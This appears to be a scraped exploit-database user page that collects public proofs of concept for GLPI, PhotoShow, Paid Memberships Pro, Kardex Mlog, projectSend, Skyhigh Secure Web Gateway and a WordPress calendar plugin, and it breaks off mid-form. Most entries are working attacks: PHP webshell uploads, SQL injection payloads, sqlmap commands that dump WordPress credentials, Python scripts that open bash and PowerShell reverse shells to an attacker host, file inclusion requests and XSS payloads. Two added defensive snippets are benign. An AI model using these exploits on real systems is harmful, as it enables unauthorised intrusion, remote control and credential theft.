
Everything posted by HireHackking
-
GLPI Cartography Plugin v6.0.0 - Unauthenticated Remote Code Execution (RCE)
# Exploit Title: GLPI Cartography Plugin v6.0.0 - Unauthenticated Remote Code Execution (RCE)
# Date found: 11 Jun 2022
# Application: GLPI Cartography < 6.0.0
# Author: Nuri Çilengir
# Vendor Homepage: https://glpi-project.org/
# Software Link: https://github.com/InfotelGLPI/positions
# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/
# Tested on: Ubuntu 22.04
# CVE: CVE-2022-34128

# PoC

POST /marketplace/positions/front/upload.php?name=poc.php HTTP/1.1
Host: 192.168.56.113
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Length: 39
Origin: http://192.168.56.113
Connection: close

<?php echo system($_GET["cmd"]); ?>
-
GLPI v10.0.2 - SQL Injection (Authentication Depends on Configuration)
# ADVISORY INFORMATION
# Exploit Title: GLPI v10.0.2 - SQL Injection (Authentication Depends on Configuration)
# Date found: 11 Jun 2022
# Application: GLPI >=10.0.0, < 10.0.3
# Author: Nuri Çilengir
# Vendor Homepage: https://glpi-project.org/
# Software Link: https://github.com/glpi-project/glpi
# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/
# Tested on: Ubuntu 22.04
# CVE: CVE-2022-31056

# PoC

POST /front/change.form.php HTTP/1.1
Host: acme.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------190705055020145329172298897156
Content-Length: 4836
Cookie: glpi_8ac3914e6055f1dc4d1023c9bbf5ce82_rememberme=%5B2%2C%22wSQx0155YofQn53WMozDGuSI1p2KAzxZ392stmrX%22%5D; glpi_8ac3914e6055f1dc4d1023c9bbf5ce82=f3cciacap6rqs2bcoaio5lmikg

-----------------------------190705055020145329172298897156
Content-Disposition: form-data; name="id"

0
-----------------------------190705055020145329172298897156
Content-Disposition: form-data; name="_glpi_csrf_token"

752d2ff606bf360d809b682f0d9da9c23b290b31453f493f4924e16e77bbba35
-----------------------------190705055020145329172298897156
Content-Disposition: form-data; name="_actors"

{"requester":[],"observer":[],"assign":[{"itemtype":"User","items_id":"2','2',); INSERT INTO `glpi_documenttypes` (`name`, `ext`, `icon`, `mime`, `is_uploadable`) VALUES('PHP', 'php', 'jpg-dist.png', 'application/x-php', 1); ---'","use_notification":"1","alternative_email":""}]}
-----------------------------190705055020145329172298897156--

If you manipulate the filename uploaded to the system, the file is placed under /files/_tmp/. The HTTP request required to trigger the issue is as follows.

POST /ajax/fileupload.php HTTP/1.1
Host: 192.168.56.113
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Glpi-Csrf-Token: bb1c7f6cd4c1865838b234b4f703172a57c19c276d11eb322936d770d75c6dd7
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------102822935214007887302871396841
Content-Length: 559
Origin: http://acme.com
Cookie: glpi_8ac3914e6055f1dc4d1023c9bbf5ce82_rememberme=%5B2%2C%22wSQx0155YofQn53WMozDGuSI1p2KAzxZ392stmrX%22%5D; glpi_8ac3914e6055f1dc4d1023c9bbf5ce82=f3cciacap6rqs2bcoaio5lmikg

-----------------------------102822935214007887302871396841
Content-Disposition: form-data; name="name"

_uploader_filename
-----------------------------102822935214007887302871396841
Content-Disposition: form-data; name="showfilesize"

1
-----------------------------102822935214007887302871396841
Content-Disposition: form-data; name="_uploader_filename[]"; filename="test.php"
Content-Type: application/x-php

<?php echo system($_GET['cmd']); ?>
-----------------------------102822935214007887302871396841--

# POC URL
http://192.168.56.113/files/_tmp/poc.php?cmd=
-
GLPI Activity v3.1.0 - Authenticated Local File Inclusion on Activity plugin
# Exploit Title: GLPI Activity v3.1.0 - Authenticated Local File Inclusion on Activity plugin
# Date found: 11 Jun 2022
# Application: GLPI Activity < 3.1.0
# Author: Nuri Çilengir
# Vendor Homepage: https://glpi-project.org/
# Software Link: https://github.com/InfotelGLPI/activity
# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/
# Tested on: Ubuntu 22.04
# CVE : CVE-2022-34125

# PoC

GET /marketplace/activity/front/cra.send.php?&file=../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&seefile=1 HTTP/1.1
Host: 192.168.56.113
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
-
PhotoShow 3.0 - Remote Code Execution
# Exploit Title: PhotoShow 3.0 - Remote Code Execution
# Date: January 11, 2023
# Exploit Author: LSCP Responsible Disclosure Lab
# Detailed Bug Description: https://lscp.llc/index.php/2021/07/19/how-white-box-hacking-works-remote-code-execution-and-stored-xss-in-photoshow-3-0/
# Vendor Homepage: https://github.com/thibaud-rohmer
# Software Link: https://github.com/thibaud-rohmer/PhotoShow
# Version: 3.0
# Tested on: Ubuntu 20.04 LTS
# creds of a user with admin privileges required

import sys
import requests
import base64
import urllib.parse

if(len(sys.argv)!=6):
    print('Usage: \n\tpython3 ' + sys.argv[0] + ' "login" ' + '"password" "target_ip" "attacker_ip" "attacker_nc_port"')
    quit()

login=sys.argv[1]
password=sys.argv[2]
targetIp = sys.argv[3]
attackerIp = sys.argv[4]
attackerNcPort = sys.argv[5]


def main():
    session = requests.Session()
    #login as admin user
    logInSession(session, targetIp, login, password)
    #change application behaviour for handling .mp4 video
    uploadExpoit(session, targetIp, attackerIp, attackerNcPort)
    #send the shell to attaker's nc by uploading .mp4 video
    sendMP4Video(session, targetIp)
    print("Check your netcat")


def logInSession(session, targetIp, login, password):
    session.headers.update({'Content-Type' : "application/x-www-form-urlencoded"})
    data = "login="+login+"&password="+password
    url = "http://"+targetIp+"/?t=Login"
    response= session.post(url, data=data)
    phpsessid=response.headers.get("Set-Cookie").split(";")[0]
    session.headers.update({'Cookie' : phpsessid})


def uploadExpoit(session, targetIp, attackerIp, attackerNcPort):
    exiftranPathInjection=createInjection(attackerIp, attackerNcPort)
    url = "http://"+targetIp+"/?t=Adm&a=Set"
    data = "name=PhotoShow&site_address=&loc=default.ini&user_theme=Default&" \
        + "rss=on&max_comments=50&thumbs_size=200&fbappid=&ffmpeg_path=&encode_video=on&"\
        + "ffmpeg_option=-threads+4+-vcodec+libx264+-acodec+libfdk_aac&rotate_image=on&"\
        + exiftranPathInjection
    session.post(url, data=data).content.decode('utf8')


def createInjection(attakerIp, attackerNcPort):
    textToEncode = "bash -i >& /dev/tcp/"+attackerIp+"/"+attackerNcPort+" 0>&1"
    b64Encoded = base64.b64encode(textToEncode.encode("ascii"))
    strb64 = str(b64Encoded)
    strb64 = strb64[2:len(strb64)-1]
    injection = {"exiftran_path":"echo "+ strb64 +" | base64 -d > /tmp/1.sh ;/bin/bash /tmp/1.sh"}
    return urllib.parse.urlencode(injection)


def sendMP4Video(session, targetIp):
    session.headers.update({'Content-Type' : "multipart/form-data; "\
        +"boundary=---------------------------752343701418612422363028651"})
    url = "http://"+targetIp+"/?a=Upl"
    data = """-----------------------------752343701418612422363028651\r
Content-Disposition: form-data; name="path"\r
\r
\r
-----------------------------752343701418612422363028651\r
Content-Disposition: form-data; name="inherit"\r
\r
1\r
-----------------------------752343701418612422363028651\r
Content-Disposition: form-data; name="images[]"; filename="a.mp4"\r
Content-Type: video/mp4\r
\r
a\r
-----------------------------752343701418612422363028651--\r
"""
    try:
        session.post(url, data=data, timeout=0.001)
    except requests.exceptions.ReadTimeout:
        pass


if __name__ =="__main__":
    main()
-
Paid Memberships Pro v2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection
#!/usr/bin/env python
# Exploit Title: Paid Memberships Pro v2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection
# Exploit Author: r3nt0n
# CVE: CVE-2023-23488
# Date: 2023/01/24
# Vulnerability discovered by Joshua Martinelle
# Vendor Homepage: https://www.paidmembershipspro.com
# Software Link: https://downloads.wordpress.org/plugin/paid-memberships-pro.2.9.7.zip
# Advisory: https://github.com/advisories/GHSA-pppw-hpjp-v2p9
# Version: < 2.9.8
# Tested on: Debian 11 - WordPress 6.1.1 - Paid Memberships Pro 2.9.7
#
# Running this script against a WordPress instance with Paid Membership Pro plugin
# tells you if the target is vulnerable.
# As the SQL injection technique required to exploit it is Time-based blind, instead of
# trying to directly exploit the vuln, it will generate the appropriate sqlmap command
# to dump the whole database (probably very time-consuming) or specific chosen data like
# usernames and passwords.
#
# Usage example: python3 CVE-2023-23488.py http://127.0.0.1/wordpress

import sys
import requests


def get_request(target_url, delay="1"):
    payload = "a' OR (SELECT 1 FROM (SELECT(SLEEP(" + delay + ")))a)-- -"
    data = {'rest_route': '/pmpro/v1/order', 'code': payload}
    return requests.get(target_url, params=data).elapsed.total_seconds()


print('Paid Memberships Pro < 2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection\n')

if len(sys.argv) != 2:
    print('Usage: {} <target_url>'.format("python3 CVE-2023-23488.py"))
    print('Example: {} http://127.0.0.1/wordpress'.format("python3 CVE-2023-23488.py"))
    sys.exit(1)

target_url = sys.argv[1]

try:
    print('[-] Testing if the target is vulnerable...')
    req = requests.get(target_url, timeout=15)
except:
    print('{}[!] ERROR: Target is unreachable{}'.format(u'\033[91m',u'\033[0m'))
    sys.exit(2)

if get_request(target_url, "1") >= get_request(target_url, "2"):
    print('{}[!] The target does not seem vulnerable{}'.format(u'\033[91m',u'\033[0m'))
    sys.exit(3)

print('\n{}[*] The target is vulnerable{}'.format(u'\033[92m', u'\033[0m'))
print('\n[+] You can dump the whole WordPress database with:')
print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump'.format(target_url))
print('\n[+] To dump data from specific tables:')
print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump -T wp_users'.format(target_url))
print('\n[+] To dump only WordPress usernames and passwords columns (you should check if the users table has the default name):')
print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump -T wp_users -C user_login,user_pass'.format(target_url))
sys.exit(0)
-
Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution)
#!/usr/bin/env python3
# Exploit Title: Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution)
# Date: 12/13/2022
# Exploit Author: Patrick Hener
# Vendor Homepage: https://www.kardex.com/en/mlog-control-center
# Version: 5.7.12+0-a203c2a213-master
# Tested on: Windows Server 2016
# CVE : CVE-2023-22855
# Writeup: https://hesec.de/posts/CVE-2023-22855
#
# You will need to run a netcat listener beforehand: ncat -lnvp <port>
#

import requests, argparse, base64, os, threading
from impacket import smbserver


def probe(target):
    headers = {
        "Accept-Encoding": "deflate"
    }
    res = requests.get(f"{target}/\\Windows\\win.ini", headers=headers)
    if "fonts" in res.text:
        return True
    else:
        return False


def gen_payload(lhost, lport):
    rev_shell_blob = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()'
    rev_shell_blob_b64 = base64.b64encode(rev_shell_blob.encode('UTF-16LE'))
    payload = f"""<#@ template language="C#" #>
<#@ Import Namespace="System" #>
<#@ Import Namespace="System.Diagnostics" #>
<#
var proc1 = new ProcessStartInfo();
string anyCommand;
anyCommand = "powershell -e {rev_shell_blob_b64.decode()}";
proc1.UseShellExecute = true;
proc1.WorkingDirectory = @"C:\Windows\System32";
proc1.FileName = @"C:\Windows\System32\cmd.exe";
proc1.Verb = "runas";
proc1.Arguments = "/c "+anyCommand;
Process.Start(proc1);
#>"""
    return payload


def start_smb_server(lhost):
    server = smbserver.SimpleSMBServer(listenAddress=lhost, listenPort=445)
    server.addShare("SHARE", os.getcwd(), '')
    server.setSMB2Support(True)
    server.setSMBChallenge('')
    server.start()


def trigger_vulnerability(target, lhost):
    headers = {
        "Accept-Encoding": "deflate"
    }
    requests.get(f"{target}/\\\\{lhost}\\SHARE\\exploit.t4", headers=headers)


def main():
    # Well, args
    parser = argparse.ArgumentParser()
    parser.add_argument('-t', '--target', help='Target host url', required=True)
    parser.add_argument('-l', '--lhost', help='Attacker listening host', required=True)
    parser.add_argument('-p', '--lport', help='Attacker listening port', required=True)
    args = parser.parse_args()

    # Probe if target is vulnerable
    print("[*] Probing target")
    if probe(args.target):
        print("[+] Target is alive and File Inclusion working")
    else:
        print("[-] Target is not alive or File Inclusion not working")
        exit(-1)

    # Write payload to file
    print("[*] Writing 'exploit.t4' payload to be included later on")
    with open("exploit.t4", 'w') as template:
        template.write(gen_payload(args.lhost, args.lport))
        template.close()

    # Start smb server in background
    print("[*] Starting SMB Server in the background")
    smb_server_thread = threading.Thread(target=start_smb_server, name="SMBServer", args=(args.lhost,))
    smb_server_thread.start()

    # Rev Shell reminder
    print("[!] At this point you should have spawned a rev shell listener")
    print(f"[i] 'ncat -lnvp {args.lport}' or 'rlwrap ncat -lnvp {args.lport}'")
    print("[?] Are you ready to trigger the vuln? Then press enter!")
    input()  # Wait for input then continue

    # Trigger vulnerability
    print("[*] Now triggering the vulnerability")
    trigger_vulnerability(args.target, args.lhost)

    # Exit
    print("[+] Enjoy your shell. Bye!")
    os._exit(1)


if __name__ == "__main__":
    main()
-
projectSend r1605 - Remote Code Execution RCE
Exploit Title: projectSend r1605 - Remote Code Execution RCE
Application: projectSend
Version: r1605
Bugs: rce via file extension manipulation
Technology: PHP
Vendor URL: https://www.projectsend.org/
Software Link: https://www.projectsend.org/
Date found: 26-01-2023
Author: Mirabbas Ağalarov
Tested on: Linux
POC video: https://youtu.be/Ln7KluDfnk4

2. Technical Details & POC
========================================

1. The attacker first creates a txt file and pastes the following code into it, then changes the file extension to jpg, because the system does not allow php, sh, exe etc. files.

bash -i >& /dev/tcp/192.168.100.18/4444 0>&1

2. Then the attacker starts listening on the ip and port:

nc -lvp 4444

3. When uploading the file, the browser makes the HTTP request below. The file name should be like this: openme.sh;jpg

POST /includes/upload.process.php HTTP/1.1
Host: localhost
Content-Length: 525
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-platform: "Linux"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0enbZuQQAtahFVjI
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/upload.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59
Connection: close

------WebKitFormBoundary0enbZuQQAtahFVjI
Content-Disposition: form-data; name="name"

openme.sh;jpg
------WebKitFormBoundary0enbZuQQAtahFVjI
Content-Disposition: form-data; name="chunk"

0
------WebKitFormBoundary0enbZuQQAtahFVjI
Content-Disposition: form-data; name="chunks"

1
------WebKitFormBoundary0enbZuQQAtahFVjI
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream

bash -i >& /dev/tcp/192.168.100.18/4444 0>&1
------WebKitFormBoundary0enbZuQQAtahFVjI--

4. In the second request, we set the filename section at the bottom to: openme.sh

POST /files-edit.php?ids=34 HTTP/1.1
Host: localhost
Content-Length: 1016
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryc8btjvyb3An7HcmA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/files-edit.php?ids=34&type=new
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59
Connection: close

------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="csrf_token"

66540808a4bd64c0f0566e6c20a4bc36c49dfac41172788424c6924b15b18d02
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][id]"

34
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][original]"

openme.sh;.jpg
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][file]"

1674759035-52e51cf3f58377b8a687d49b960a58dfc677f0ad-openmesh.jpg
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][name]"

openme.sh
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][description]"


------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][expiry_date]"

25-02-2023
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="save"


------WebKitFormBoundaryc8btjvyb3An7HcmA--

It doesn't matter who downloads your file: if it is opened, the reverse shell is triggered and code execution follows.

Private YouTube video PoC: https://youtu.be/Ln7KluDfnk4
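The bypass above works because the upload check looks only at the part of the name that follows the last separator, and the later edit step renames the stored file freely. As an added defensive example (not projectSend's own code; the allowlist, character set and function names are assumptions), the following Python validates the whole basename on upload and only permits a rename that keeps the validated extension:

```python
import posixpath
import re

# Assumed allowlist of upload types for this illustration
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}

# Whole-basename character policy: no ';', no spaces, no shell metacharacters
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]*$")


def validate_upload_name(name: str):
    """Return the accepted basename, or None when the name must be rejected.

    The policy is applied to the entire basename, so 'openme.sh;jpg' fails on
    the ';' character before any extension logic runs, and 'openme.sh' fails
    because 'sh' is not an allowed type. Stacked extensions such as
    'shell.php.jpg' are rejected as well.
    """
    # Normalise Windows separators and strip any directory component
    base = posixpath.basename(name.replace("\\", "/"))
    if not SAFE_NAME.match(base):
        return None
    parts = base.lower().rsplit(".", 1)
    if len(parts) != 2 or parts[1] not in ALLOWED_EXTENSIONS:
        return None
    if "." in parts[0]:
        return None  # stacked extension
    return base


def extension_of(name: str) -> str:
    return name.rsplit(".", 1)[1].lower()


def rename_allowed(stored_name: str, new_name: str) -> bool:
    """A rename (the files-edit step) must pass the same check and must not
    change the extension the file was validated and stored with."""
    new = validate_upload_name(new_name)
    if new is None:
        return False
    return extension_of(new) == extension_of(stored_name)


if __name__ == "__main__":
    # Constructed sample names, mirroring the advisory's sequence
    for candidate in ("photo.jpg", "openme.sh;jpg", "openme.sh", "shell.php.jpg"):
        print(f"{candidate!r:20} -> {validate_upload_name(candidate)}")
    print("rename photo.jpg -> openme.sh allowed:", rename_allowed("photo.jpg", "openme.sh"))
```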
-
Secure Web Gateway 10.2.11 - Cross-Site Scripting (XSS)
Exploit Title: Secure Web Gateway 10.2.11 - Cross-Site Scripting (XSS)

Product: Secure Web Gateway
Affected Versions: 10.2.11, potentially other versions
Fixed Versions: 10.2.17, 11.2.6, 12.0.1
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: https://www.skyhighsecurity.com/en-us/products/secure-web-gateway.html
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2022-002
Advisory Status: published
CVE: CVE-2023-0214
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0214

Introduction
============

"Skyhigh Security Secure Web Gateway (SWG) is the intelligent, cloud-native web security solution that connects and secures your workforce from malicious websites and cloud apps—from anywhere, any application, and any device."

(from the vendor's homepage)

More Details
============

The Secure Web Gateway's (SWG) block page, which is displayed when a request or response is blocked by a rule, can contain static files such as images, stylesheets or JavaScript code. These files are embedded using special URL paths. Consider the following excerpt of a block page:

------------------------------------------------------------------------
<html>
<!-- FileName: index.html
Language: [en]
-->
<!--Head-->
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<title>McAfee Web Gateway - Notification</title>
<script src="/mwg-internal/de5fs23hu73ds/files/javascript/sw.js" type="text/javascript" ></script>
<link rel="stylesheet" href="/mwg-internal/de5fs23hu73ds/files/default/stylesheet.css" />
</head>
------------------------------------------------------------------------

Static content is loaded from URL paths prefixed with "/mwg-internal/de5fs23hu73ds/". It was discovered that paths with this prefix are intercepted and directly handled by the SWG no matter on which domain they are accessed. While the prefix can be configured in the SWG, attackers can also obtain it using another currently undisclosed vulnerability.

By reverse engineering the file "libSsos.so" and analysing JavaScript code, it was possible to derive the API of the "Ssos" plugin's "SetLoginToken" action. Through the following call using the command-line HTTP client curl, the behaviour of the plugin was further analysed:

------------------------------------------------------------------------
$ curl --proxy http://192.168.1.1:8080 -i 'https://gateway.example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=v&c=c&p=p'
HTTP/1.0 200 OK
P3P: p
Connection: Keep-Alive
Set-Cookie: MwgSso=v; Path=/; Max-Age=240;
Content-Type: application/javascript
Content-Length: 2
X-Frame-Options: deny

c;
------------------------------------------------------------------------

The response embeds the values of the three URL parameters "v", "c" and "p". The value for "p" is embedded as the value of the "P3P" header, the value of "c" as the response body and the value of "v" as the value of the cookie "MwgSso". It is also possible to include newline or carriage return characters in the parameter value, which are not encoded in the output.

Consequently, if the value of the parameter "p" contains a line break, arbitrary headers can be injected. If two line breaks follow, an arbitrary body can be injected. If a suitable "Content-Length" header is injected, the remaining headers and body of the original response will be ignored by the browser. This means that apart from the initial "P3P" header, an arbitrary response can be generated. For example, a page containing JavaScript code could be returned, resulting in a cross-site scripting attack.

Consequently, attackers can construct URL paths that can be appended to any domain and cause an arbitrary response to be returned if the URL is accessed through the SWG. This could be exploited by distributing such URLs or even by offering a website which performs an automatic redirect to any other website using such a URL. As a result, the SWG exposes its users to self-induced cross-site scripting vulnerabilities in any website.

Proof of Concept
================

In the following request, the "p" parameter is used to inject suitable "Content-Type" and "Content-Length" headers, as well as an arbitrary HTML response body.

------------------------------------------------------------------------
$ curl --proxy http://192.168.1.1:8080 'https://gateway.example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=v&c=c&p=p%0aContent-Type: text/html%0aContent-Length: 27%0a%0a<h1>RedTeam Pentesting</h1>'
HTTP/1.0 200 OK
P3P: p
Content-Type: text/html
Content-Length: 27

<h1>RedTeam Pentesting</h1>
------------------------------------------------------------------------

As mentioned above, the HTTP response body could also include JavaScript code designed to interact with the domain specified in the URL, resulting in a cross-site scripting vulnerability.

Workaround
==========

None.

Fix
===

According to the vendor, the vulnerability is mitigated in versions 10.2.17, 11.2.6 and 12.0.1 of the Secure Web Gateway. This was not verified by RedTeam Pentesting GmbH. The vendor's security bulletin can be found at the following URL:

https://kcm.trellix.com/corporate/index?page=content&id=SB10393

Security Risk
=============

The vulnerability could be used to perform cross-site scripting attacks against users of the SWG in the context of any domain. Attackers only need to convince users to open a prepared URL or visit an attacker's website that could perform an automatic redirect to an exploit URL. This exposes any website visited through the SWG to the various risks and consequences of a cross-site scripting vulnerability such as account takeover. As a result, this vulnerability poses a high risk.
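The root cause described above is that parameter values are copied into header, cookie and body positions without CR/LF being rejected. As an added example on the defender's side (not code from the advisory or the vendor), the Python below applies the check the plugin should have made and uses it to scan proxy-access-log entries for SetLoginToken requests whose echoed parameters carry a line break; the log line layout and the log lines are constructed here, and the path prefix segment is matched generically because the advisory notes it is configurable.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# The plugin endpoint from the advisory; the middle segment (de5fs23hu73ds in
# the write-up) is deployment-specific, so any single segment is accepted.
PLUGIN_PATH = re.compile(r"^/mwg-internal/[^/]+/plugin$")
ECHOED_PARAMS = ("v", "c", "p")  # copied into cookie, body and P3P header
CRLF = re.compile(r"[\r\n]")


def header_value_is_safe(value: str) -> bool:
    """A value may only be placed in a header, cookie or body if it has no CR/LF.
    This is the validation whose absence enables the response splitting."""
    return CRLF.search(value) is None


def unsafe_params(url: str) -> list:
    """Names of echoed SetLoginToken parameters whose decoded value contains CR or LF."""
    parts = urlsplit(url)
    if not PLUGIN_PATH.match(parts.path):
        return []
    # parse_qsl percent-decodes, so %0a and %0d become real line breaks here
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    if params.get("target") != "Ssos" or params.get("action") != "SetLoginToken":
        return []
    return [k for k in ECHOED_PARAMS if k in params and not header_value_is_safe(params[k])]


def scan_log(lines):
    """Constructed log format: '<client-ip> <method> <url>' per line.
    Returns (client, url, offending-parameter-names) for each hit."""
    hits = []
    for line in lines:
        try:
            client, _method, url = line.strip().split(" ", 2)
        except ValueError:
            continue  # malformed line, skip
        bad = unsafe_params(url)
        if bad:
            hits.append((client, url, bad))
    return hits


# Constructed sample lines: a benign call, one carrying the advisory's
# header-injection shape in "p", and an unrelated URL with an encoded CR.
SAMPLE_LOG = [
    "10.0.0.5 GET https://gateway.example.com/mwg-internal/de5fs23hu73ds/plugin"
    "?target=Ssos&action=SetLoginToken&v=v&c=c&p=p",
    "10.0.0.7 GET https://gateway.example.com/mwg-internal/de5fs23hu73ds/plugin"
    "?target=Ssos&action=SetLoginToken&v=v&c=c"
    "&p=p%0aContent-Type:%20text/html%0aContent-Length:%2027%0a%0a%3Ch1%3Etest%3C/h1%3E",
    "10.0.0.9 GET https://www.example.org/index.html?p=a%0db",
]

if __name__ == "__main__":
    for client, url, bad in scan_log(SAMPLE_LOG):
        print(f"{client}: CR/LF in parameter(s) {bad} of {url}")
```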
Timeline
========

2022-07-29 Vulnerability identified
2022-10-20 Customer approved disclosure to vendor
2022-10-20 Vulnerability was disclosed to the vendor
2023-01-17 Patch released by vendor for versions 10.2.17, 11.2.6 and 12.0.1.
2023-01-26 Detailed advisory released by RedTeam Pentesting GmbH

RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/

Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/

--
RedTeam Pentesting GmbH
Alter Posthof 1
52062 Aachen
Germany
Tel.: +49 241 510081-0
Fax : +49 241 510081-99
https://www.redteam-pentesting.de
Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
-
Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS)
# Exploit Title: Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS)
# Date: 2022-05-25
# Exploit Author: Mostafa Farzaneh
# WPScan page: https://wpscan.com/vulnerability/95f92062-08ce-478a-a2bc-6d026adf657c
# Vendor Homepage: https://wordpress.org/plugins/cp-multi-view-calendar/
# Software Link: https://downloads.wordpress.org/plugin/cp-multi-view-calendar.1.4.06.zip
# Version: 1.4.06
# Tested on: Linux
# CVE : CVE-2022-2846

# Description:
The Calendar Event Multi View WordPress plugin before 1.4.07 does not have any authorisation and CSRF checks in place when creating an event, and is also lacking sanitisation as well as escaping in some of the event fields. This could allow unauthenticated attackers to create arbitrary events and put Cross-Site Scripting payloads in them.

# POC and exploit code:
As an unauthenticated user, to add a malicious event (on October 6th, 2022) to the calendar with ID 1, open the code below:

<html>
<body>
<form action="https://example.com/?cpmvc_do_action=mvparse&f=datafeed&calid=1&month_index=0&method=adddetails" method="POST">
<input type="hidden" name="Subject" value='"><script>alert(/XSS/)</script>' />
<input type="hidden" name="colorvalue" value="#f00" />
<input type="hidden" name="rrule" value="" />
<input type="hidden" name="rruleType" value="" />
<input type="hidden" name="stpartdate" value="10/6/2022" />
<input type="hidden" name="stparttime" value="00:00" />
<input type="hidden" name="etpartdate" value="10/6/2022" />
<input type="hidden" name="etparttime" value="00:00" />
<input type="hidden" name="stpartdatelast" value="10/6/2022" />
